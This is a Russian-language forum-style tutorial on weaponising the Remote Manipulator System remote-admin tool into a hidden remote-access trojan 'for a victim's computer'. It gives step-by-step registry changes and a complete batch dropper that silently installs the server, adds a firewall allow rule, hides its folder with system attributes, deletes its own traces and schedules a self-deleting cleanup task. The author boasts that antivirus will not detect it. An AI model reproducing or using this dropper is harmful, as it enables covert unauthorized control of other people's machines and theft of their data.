В данной статье будет так сказать рецепт приготовления вируса с такой замечательной программы как Remote Manipulators System(далее просто RMS),скачать её можно и нужно с офф сайта http://rmansys.ru/
Вообщем скачиваем прогу с офф сайта,устанавливаем себе сервера ( rms.server5.0ru.msi ) и начинаем мутить вирус.
Сам рецепт в принципе банален,устанавливаем прогу,настраиваем все параметры и пытаемся сделать с неё Portable версию(так сказать) с тихой установкой,которая не будет задавать ни каких вопросов и запускаться после установки вместе с системой,опять же не задавая ни каких вопросов.
Ну так сказать перейдём от теории к практике))
Во время установки не убираем ни каких галочек ни где,наше движение согласится с соглашением и тыкать на кнопку Next и install далее только подтверждать разрешения запуска файла,в итоге на самом последнем окошке не убирая галку с Launche (и т.д.) тыкаем на кнопку Finish,у нас появится вот такое окошко:
Вбиваем пас который должен быть не менее 8 символов и тыкаем кнопку Ok,далее двигаем в трей где будет висеть значёк сервера RMS,
тыкаем
по нему левой кнопкой мыши и выбираем первый пункт меню
Ставим настройки как на скрине:
Жмём кнопку Ok,попросят перезагрзить сервер,перезагрузим но позже,для начала определимся с вирусом,вернее для каких целей мы будем его создавать,вернее в каком плане будет его распространение,в массовом или на определённого чела,если для массового распространения то можно смело перезагржать сервер,если же для определённого чела то можно настроить конект не через IP адрес,а через ID.
Для этого двигаем опять в трей и выбираем в меню настроить internet-ID соединение...
в итоге получим:
Это и будет ID через который будет проходить конект,то есть для подключения к этому серверу(в будущем вирусу) нужен будет только этот ID,вот теперь тыкаем в трее остановить RMS и идём в меню пуск для того что бы его запустить,как только запустили можно переходить к ключу реестра,который находится по адресу: HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System,идеём дальше по этой ветке и заходим в подкаталог \v4\Server\Parameters,далее меняем значение параметра FUSClientPath,то есть тупа указываем путь где в будущем будет находится сам вирус,допустим я буду делать на папку %SystemRoot%\appstade,то есть в эту папку в будущем выгрузятся все компаненты необходимые для работы вируса.
Жмякнули,изменили,экспортировали пошли дальше в ветку по пути: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RManService,здесь тоже меняем значение параметра ImagePath,указываем тот же путь что и в пред идущей ветке:
Изменили,экспортировали,теперь соединим эти два ключа в один и займёмся файлами самой проги,по умолчанию они встают в папку Program Files\Remote Manipulator System - Server,значить топаем туда и копируем\вырезаем от туда файлы: rfusclient.exe,rutserv.exe,rversionlib.dll,HookDrv.dll,это собственно всё что нам нужно,можно смело удалять сам сервак с компа,так как он нам реально не нужен))
Теперь напишем снова примитивный батинок,который и будет устанавливать наш RMS на комп жертвы,так сказать стартер нашего вируса:
Код: @echo off reg delete "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System" /f taskkill /f /im rutserv.exe /t taskkill /f /im rfusclient.exe /t :: так чисто на всякий случай net stop RManService md %SystemRoot%\appstade copy /y %systemRoot%\rutserv.exe %SystemRoot%\appstade\rutserv.exe copy /y %systemRoot%\rfusclient.exe %SystemRoot%\appstade\rfusclient.exe copy /y %systemRoot%\HookDrv.dll %SystemRoot%\appstade\HookDrv.dll copy /y %systemRoot%\rversionlib.dll %SystemRoot%\appstade\rversionlib.dll netsh advfirewall firewall add rule name="Remonts Windows" dir=in program="%SystemRoot%\appstade\rutserv.exe" security=notrequired action=allow reg import "%SystemRoot%\key.reg "%SystemRoot%\appstade\rutserv.exe" /server /firewall "%SystemRoot%\appstade\rutserv.exe" /server /silentinstall "%SystemRoot%\appstade\rutserv.exe" /server /start attrib +a +s +r +h %SystemRoot%\appstade echo @echo off>%Temp%\1.bat echo del /s /q %Systemroot%\wasf.exe >null>>%Temp%\1.bat echo del /s /q %0 >null >>%temp%\1.bat echo cls>>%temp%\1.bat echo exit>>%temp%\1.bat cd %SystemRoot%\ del /s /q rutserv.exe del /s /q rfusclient.exe del /s /q HookDrv.dll del /s /q rversionlib.dll del /s /q key.reg schtasks /create /sc minute /mo 5 /tn "Dels" /tr %temp%\1.bat /ru "System" /f exit cls
Ну по батинку должно быть все предельно ясно,ибо он реально примитивный,ну всё же не много раскидаю и добавлю небольшую изюминку так сказать,а точнее небольшой совет(ну эт будет не много позже)
Так раскидаем не много сам алгоритм батинка(ну вдруг до кого не дошло или просто что то не понятно,в принципе эт бывает)
Первым действием он удаляет ключи реестра,вообще батинок примитивный в талого,можно было конечно по уму написать проверку и т.д.,ну на кой нам эта марока?))
Пишем так на сяк,кому надо тот нарисует для себя сам(ну я так думаю все на это способны),так что он не проверяет существование ключей а тупа удаляет их нах,следом убивает процессы и останавливает службу(хотя одной службой можно обойтись),делает это он для того чтобы не выскакивало ни каких ошибок при повторном запуске файла с вирусам,то есть если чел решится снова установить себе вируса,у него не будут вылазить ни какие ошибки,тупа всё тихо и мирно встанет как надо.
Далее создаёт папку appstade куда следом перекидывает все файлы необходимые для работы RMS,вот тут может возникнуть трабла,хз по какому там ну бывает такие случае что батинок считывает свой конец и если видит в конце удаление файлов с такими именами то уже тупа не куда ни хрена не копирует а сразу пропускает это дествие и в последствие этот момент вылетает из кода батинка,для избежания таких моментов советую переименовывать файлы в разные имена,а при копирование в конечную папку возвращать их настоящие имена обратно,таким образом этот баг можно избежать,так че там дальше копирование было,теперь добавление в доверенные к брэндмауеру,тупа создаёт правило,ну эт думаю понятно,че там дальше.... импорт ключа реестра,ну думаю понятно что куда,зачем и почему,далее запуск самого сервера RMS,так на всякий случай написал запуск со всеми полезными ключами,хотя можно было в полне обойтись двумя,ну да пох пусть будут,ставим атрибут на папку и создаём в папке TEMP батинок который удалит всё лишние в том числе и самого себя,удаляем все лишние файлы с папки Windows и создаём правило Schtasks которое запустит наш созданный батинок с папки TEmp.который в свою очередь удалит выполняемый батинок и самого себя,таким макаром останется минимум который нужен для работы вируса RMS,ну вроде весь алгоритм расписал,конечно без выносок строк,ну думаю и так понятно будет.
Компилим батинок и называем его wasf.exe.
Теперь что,теперь пакуем всё это воедино,в один исполняемый файл,путь выгрузки стандартом %WindowsDir%,на запуск наш батинок wasf.exe,ну и всё вроде,вообщем вирус с RMS готов к употреблению!)
Пользуемся и радуемся,правда радоваться можно будет только функционалу вируса,в скорости он однако очень сильно уступает своим аналогам,даже тому же радмину ох как будет уступать,ну да не это главное,главное то что на него не будет верещать антивирус,хотя есть у него ещё офигительный минус,это конечный вес,вес будет достигать в сжатом состояние порядка 2< метров,даже больше,смотря чем и как сжимать и паковать,так что из плюсов опять же только функционал,конект через ID и пофигизм антивирусов))
Вообщем Удачи в вирусо создание!)